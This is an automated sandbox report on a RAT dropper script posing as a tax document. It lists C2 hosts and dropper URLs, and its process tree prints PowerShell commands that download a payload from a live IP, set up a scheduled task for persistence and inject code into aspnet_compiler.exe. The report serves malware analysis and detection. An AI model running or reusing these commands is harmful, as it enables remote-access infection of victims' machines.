Overview

overview

10

Static

static

1

2O22-Tax-Returns.wsf

windows7-x64

10

2O22-Tax-Returns.wsf

windows10-2004-x64

10

DRlVERS-LlCENSE.wsf

windows7-x64

10

DRlVERS-LlCENSE.wsf

windows10-2004-x64

10

PR0FlT&L0SS_2O23.wsf

windows7-x64

10

PR0FlT&L0SS_2O23.wsf

windows10-2004-x64

10

ScheduIe-K.wsf

windows7-x64

10

ScheduIe-K.wsf

windows10-2004-x64

10

Analysis

  • max time kernel
    157s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-01-2024 04:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ScheduIe-K.wsf

  • Size

    4KB

  • MD5

    eafa5d2bdb1f8bca65b208d7e6101e1c

  • SHA1

    da7085b340e3b02d94bb4acc92ee9475133b7948

  • SHA256

    572a90ba88b5424d527785d48667dfd95293469b07ab016970b7253e2bb5d0d0

  • SHA512

    2114d0dda32e2224c8253a9ec038b6f212a01082bb73222780391e0842a73097c57454f248135671f67662f419bba9c5cbb7721a1eba6790eb59381e7a4bbda8

  • SSDEEP

    96:021JYd1k2ig3AwYx4wg3CWPqrHekw21JYd1k2ig3AwYx4wg3CWPqrHek4:Np2ioAwYgSWPqTeGp2ioAwYgSWPqTeB

Score
10/10
asyncratzgratbbrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.107.185.29:666/Rar.jpg
exe.dropper

http://176.107.185.29:666/load.rar

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

BB

C2

icant.theworkpc.com:6606

icant.theworkpc.com:7707

icant.theworkpc.com:8808

icant.theworkpc.com:5550
Mutex

AsyncMutex_alosh

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Detect ZGRat V1 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ScheduIe-K.wsf"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:64
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-BitsTransfer -Source 'http://176.107.185.29:666/Rar.jpg' -Destination 'C:\Users\Public\Rar.exe'; Start-BitsTransfer -Source 'http://176.107.185.29:666/load.rar' -Destination 'C:\Users\Public\load.rar'"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2312
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c Rar.exe x -p111 load.rar
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2784
      • C:\Users\Public\Rar.exe
        Rar.exe x -p111 load.rar
        3⤵
          PID:4904
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4640
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3676
          • C:\Windows\system32\wscript.exe
            WScript /B "C:\Users\Public\PowerRun.vbs"
            4⤵
              PID:2020
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1020
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2988
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Public\run.bat" C:\Users\Public\"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1688
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\run.ps1"
              4⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1372
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:3644
      • C:\Windows\System32\WScript.exe
        C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
        1⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\run.bat" C:\Users\Public\"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3212
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\run.ps1"
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4240
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              4⤵
                PID:4356

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Initial Access

        Execution

        Persistence

        Privilege Escalation

        Defense Evasion

        Credential Access

        Discovery

        Query Registry

        2
        T1012

        System Information Discovery

        2
        T1082

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Resource Development

        Reconnaissance

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          61e2e57471d559f5f6813c0a7995c075

          SHA1

          33c621541bc0892ddab1b65345a348c14af566e5

          SHA256

          c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d

          SHA512

          9fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          a43ae420831aab8a88da493cff216aed

          SHA1

          ba619ccfc2e869d77a0a508592d17999277f0718

          SHA256

          2a3e28f3c1df947fcef9a9c791632e9bd1a9e97c3838c58912b8e4cb74f3d7a2

          SHA512

          d7da451bc66a4f32a9fc4b8edc8a8c4e89b340c7736f3513c66657efd1e85fa43c30d1a27834044a35c57e714dc35fa97cf3d9922f1773aa781dc7a5095e2f39

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          34b22be6c61a0e89673221e63503e7b9

          SHA1

          aeeb4e71c2de0d1ecdd2714067293d5df54fdcc6

          SHA256

          5042bac471b1d805802849d1095aee7b503450352a246487b8dd56684a2b424a

          SHA512

          930dd2eebbb53e2c6309677c8f4450a4da7dc37642e346ecc97901827224d919fdc9dda8915ef0ffc90275c813543d5dec9aa552730cbe906f84e73404ec88cb

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xuaenaid.dwu.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit
        • C:\Users\Public\Execute.txt
          Filesize

          7B

          MD5

          40cd014b7b6251e3a22e6a45a73a64e1

          SHA1

          6ea36ce8d4940505e9a2c8fea5db868cd8b3d440

          SHA256

          e3a67d9540e9a204f7dc4aa9d44a0ec652856cfa932a21196bf9df23aa0e4cd1

          SHA512

          776d4496cc76782961d66f235ff257567e12e85b950101247fb29de911a4e44048398932f2881b5610cbad6c90fe1c4e99f346cc7d315d7b9a612c89b19b42ea

          Download Submit
        • C:\Users\Public\Framework.txt
          Filesize

          520B

          MD5

          6a08392ecf95df7fc91917dcfaae8da6

          SHA1

          480f6a5c761e1a069c0d68f5ac2aabf727791393

          SHA256

          0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460

          SHA512

          d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e

          Download Submit
        • C:\Users\Public\Gettype.txt
          Filesize

          7B

          MD5

          9221b7b54ed96de7281d31f8ae35be6a

          SHA1

          223fad426aa8c753546501b0643ee1720b57bff0

          SHA256

          8eab5c7c6d1116d28014f0da7b7e78b9857da1e6f951b903f2a714fc6d3c790a

          SHA512

          be37de186628a2c30698a6d4826ec5f8845e7b69317b2f044e86fae615c263a5fd179fcbc50821c85b49c9e3e71adb10a947060312da281418c8ca231d656d5d

          Download Submit
        • C:\Users\Public\Invoke.txt
          Filesize

          6B

          MD5

          5fb833d20ef9f93596f4117a81523536

          SHA1

          d6aa1f3a789f3f3108666e0ac807ca5ca7dc5fa5

          SHA256

          e77f5b9f691679ef6fa67d3ec953199b1696cf6a0e77741c035f11aadfd9bf73

          SHA512

          afaec35da2440502779227d9436570db82e1f5d86c90662eae82564d717407518d4e1181e024566e2d8d6029bd4e738b9ba4a3108753a8d0d0c98934db94ba35

          Download Submit
        • C:\Users\Public\NewPE2.txt
          Filesize

          9B

          MD5

          8a56a0e23dbfe7a50c5ec927b73ec5f2

          SHA1

          abebd513e68e63e7ec6ae56327c232b6e444ce0a

          SHA256

          3b348b38ac24e5e26423cc6d46936e7a4fdedda9d4aa89fdb2cfde4fad662cc1

          SHA512

          276fc17efa7fef658167a94f22c76ae2abb6768d40702a39f970f196099058139249b8e12f18569f7f42f03f581f2543e49f39ab41553dd38d85511558a77ed2

          Download Submit
        • C:\Users\Public\ali1.txt
          Filesize

          46B

          MD5

          fe12f30d0b6d429b98b1d3df92bf59a8

          SHA1

          24cffdb45d896b0a8d92281792b235d1664fce96

          SHA256

          17ec93624ff431709003973eaa0f58eed475c7ad3ca2ce4a97a8437a1bd2af93

          SHA512

          5c6740872683bbb04fc6b32eba74162b7ecd3ab91dee38e6c3ed8258e6f2d12759f10b128ff95d39b5c0c6f6fe4f7aee02b544fbcad5809064a02941c3d5cb69

          Download Submit
        • C:\Users\Public\ali3.txt
          Filesize

          96B

          MD5

          77af28c3475094912f8dc37d929baf1e

          SHA1

          4a0811f3eba94bbe7a71390d1c4802cc70fad959

          SHA256

          3f8d9f13ec6706119324a90615c3104494b73d5d4677a3038fdab3feccb4c7fc

          SHA512

          77684adce12bac287f2cab521b3f9a49f5e4a359fa1b07327f4e88f11f44ced7699d82fb8d285d175b071a4bbfc96d480851a9e17c13071b872d357596ad31b7

          Download Submit
        • C:\Users\Public\ali4.txt
          Filesize

          33B

          MD5

          44c343b055db20c5bdf1da30295b91c6

          SHA1

          63f974e8a1c0e8d4364994acdbb74f7b0502316c

          SHA256

          95c9b39a2a50a313fd4cafe36be3b72122c3548e748eb344adc3b37564bd671e

          SHA512

          def9ec591c186080155be93d4dc1916efadd2face7b02551c406f8f19a7364353fa801cb82d07364f1e4d310f0fc707a1dcd2eeb554b1530dc732449362a3b5e

          Download Submit
        • C:\Users\Public\app.js
          Filesize

          429B

          MD5

          06596b9b5999102e3eaa3bdcdc1795c5

          SHA1

          1cf86cf1f2e8bff0b7598789c716cc72483ae5c4

          SHA256

          e26f0753cf2e2b93e68ef90625e7419be606f5c88ae6b25ae0071d41d7ffc5e3

          SHA512

          5e624331982c2df74d0ac45162ace7dac316abfc625fa6180c134567cf1d2d64b3871aeb7883fe37cb6e0d2cfe82c91b7cbbc0d2b955399a31e964725328c48c

          Download Submit
        • C:\Users\Public\basta.js
          Filesize

          426B

          MD5

          ee434daaffcd151a6fc086a4fc6c0f71

          SHA1

          b6f3b6cb28ad092e8a4e1dff990632d284c9d149

          SHA256

          d2519e1deb05ba1efa82140bc96a8512edfb4482bc888c5c0103a6d78c79d9a3

          SHA512

          7d203e1f1f50cdeb2f576deff3e38b2fa342f997baade2dca3482880e6ecb6daa339f1075368e409e1618e1693761a809434dbe436e389445745d886544aaf19

          Download Submit
        • C:\Users\Public\byet.txt
          Filesize

          136KB

          MD5

          e418d273bf326faac5c90872f4286a59

          SHA1

          0bd12697fa39ba3962f4cf4fdd394ba9e0570dbe

          SHA256

          d7725fee63bbab6720f8e0ea84b141f92a2a50ae0885ecc1f86502fa9cab5d92

          SHA512

          b7f2e8ea9fc77e4f696c4575f558fd3d2de0877bd94cf41a3847ebe013ed8b8a69a513b218b1d2f4268713c8dfabd66748d452cb2c0cbee713d97c49fe0a0ae5

          Download Submit
        • C:\Users\Public\getMethod.txt
          Filesize

          9B

          MD5

          db37f91f128a82062af0f39f649ea122

          SHA1

          f21110ae7ac7cde74e7aa59b22ed10bace35b06b

          SHA256

          e53ba77fa1dbcb1cc3beed1344f6ae7b182d6a2e2a09bb32ec0d4474978e4a32

          SHA512

          681c5c69acba8c2b327afd0bcb1062fb5f6ee3231e6b95f4cd97ecd768879250eb81d36b1e1640554a85002a7b2b099acfe7f59f70884f10afd51d372583d3ae

          Download Submit
        • C:\Users\Public\load.txt
          Filesize

          4B

          MD5

          ec4d1eb36b22d19728e9d1d23ca84d1c

          SHA1

          5dbc716c4600097b85b9e51d6aeb77a4363b03ed

          SHA256

          0cf67fc72b3c86c7a454f6d86b43ed245a8e491d0e5288d4da8c7ff43a7bcdb0

          SHA512

          d67f0ffb682d7a13510ec5d3e643889d43bc7593429f806fd882b2c72c05a530c2462d332d4293015f33397cdec84c53d1eea58a7bebaab5504153729df02700

          Download Submit
        • C:\Users\Public\node.bat
          Filesize

          947B

          MD5

          ef7988ba949227574173e69ff8549364

          SHA1

          9d444282f69a7dc6b42a4e6ea56f8459433d3691

          SHA256

          9da906ffcb82af673a68966a89fae9339ca74a7837e0f7f6de1afcaaec069099

          SHA512

          44eaa249268e8d0e36832b06e0fc9079e0fa96911cb3a83c11ad9b81154a98a40fe2068a084635abd027c5791123e3098e3ebfd795ea897cb6d9b6be7e872430

          Download Submit
        • C:\Users\Public\run.bat
          Filesize

          177B

          MD5

          0bde649a7aec3a5822f4b0205c90155c

          SHA1

          f3ca91f4eff94d824bd6ec021a4eb99214ee01b8

          SHA256

          ae11f210338d39ca008393d8bbcc9abe12d0b64a6b43c03a883d02a1dc59184f

          SHA512

          cc1ca54a02345ad5bf3e927333b6ae8f3e01b90736a46672027da5d47bb76134b4f05f53c9733930dc9ea444bbf676fecfb228ccc7c6d3c3a8f56a55dd314a4e

          Download Submit
        • C:\Users\Public\run.ps1
          Filesize

          1KB

          MD5

          ce8f93f99511bd93b48c973e9e1f6e49

          SHA1

          e81d55b0489ac3ab49b54dc5ee47ec08c992607a

          SHA256

          04acbc5f824af62db5c8253f1d9a00fc359be85192f01b13ac9b5b4a89b6ad53

          SHA512

          b8b495d82927bae7942f06dc99726ba61f47af5ecb91ed5ea01f3c1025ee9bf8dc47db0a659ede05f4373e2d35fada018a44fcc8a9ad79ea0d77f91b9618ec09

          Download Submit
        • C:\Users\Public\runpe.txt
          Filesize

          550KB

          MD5

          422a2358165467eb4a4e6b6ebf194f3c

          SHA1

          3ba6075a6ac4a34ea8406c7bcd347247579cab7c

          SHA256

          96c1710a2b917504427011ecf283d4e17f8c00d02ae9f8061f53e564336bf9e6

          SHA512

          7e2332b897a333dfe1d24bb7729166241ed9d859c2cf6af0c205fb300a31febae794fddd49cac4a3f5b563c355de26b831e92aee4559677ac7fc3cdd2c67c850

          Download Submit
        • memory/1020-73-0x0000019232E00000-0x0000019232E10000-memory.dmp
          Filesize

          64KB

          Download
        • memory/1020-71-0x00007FFD789A0000-0x00007FFD79461000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1020-100-0x00007FFD789A0000-0x00007FFD79461000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1372-96-0x0000017CE3190000-0x0000017CE3206000-memory.dmp
          Filesize

          472KB

          Download
        • memory/1372-72-0x0000017CC8920000-0x0000017CC8930000-memory.dmp
          Filesize

          64KB

          Download
        • memory/1372-70-0x0000017CC8920000-0x0000017CC8930000-memory.dmp
          Filesize

          64KB

          Download
        • memory/1372-69-0x00007FFD789A0000-0x00007FFD79461000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1372-84-0x0000017CC8920000-0x0000017CC8930000-memory.dmp
          Filesize

          64KB

          Download
        • memory/1372-105-0x00007FFD789A0000-0x00007FFD79461000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1372-101-0x0000017CC8930000-0x0000017CC8982000-memory.dmp
          Filesize

          328KB

          Download
        • memory/2312-20-0x00007FFD79150000-0x00007FFD79C11000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/2312-17-0x000001F9EAF20000-0x000001F9EAF34000-memory.dmp
          Filesize

          80KB

          Download
        • memory/2312-13-0x00007FFD79150000-0x00007FFD79C11000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/2312-14-0x000001F9E8AA0000-0x000001F9E8AB0000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2312-16-0x000001F9E8A40000-0x000001F9E8A66000-memory.dmp
          Filesize

          152KB

          Download
        • memory/2312-15-0x000001F9E8AA0000-0x000001F9E8AB0000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2312-8-0x000001F9E89D0000-0x000001F9E89F2000-memory.dmp
          Filesize

          136KB

          Download
        • memory/3644-107-0x0000000005040000-0x0000000005050000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3644-106-0x00000000747E0000-0x0000000074F90000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/3644-102-0x0000000000400000-0x0000000000416000-memory.dmp
          Filesize

          88KB

          Download
        • memory/3644-108-0x0000000005BC0000-0x0000000006164000-memory.dmp
          Filesize

          5.6MB

          Download
        • memory/3644-109-0x0000000005810000-0x00000000058A2000-memory.dmp
          Filesize

          584KB

          Download
        • memory/3644-110-0x00000000057E0000-0x00000000057EA000-memory.dmp
          Filesize

          40KB

          Download
        • memory/3644-113-0x0000000006690000-0x000000000672C000-memory.dmp
          Filesize

          624KB

          Download
        • memory/3644-114-0x0000000006730000-0x0000000006796000-memory.dmp
          Filesize

          408KB

          Download
        • memory/3644-115-0x00000000747E0000-0x0000000074F90000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/3644-116-0x0000000005040000-0x0000000005050000-memory.dmp
          Filesize

          64KB

          Download
        • memory/4240-117-0x00007FFD79090000-0x00007FFD79B51000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/4240-118-0x0000014BF4010000-0x0000014BF4020000-memory.dmp
          Filesize

          64KB

          Download
        • memory/4356-130-0x00000000747E0000-0x0000000074F90000-memory.dmp
          Filesize

          7.7MB

          Download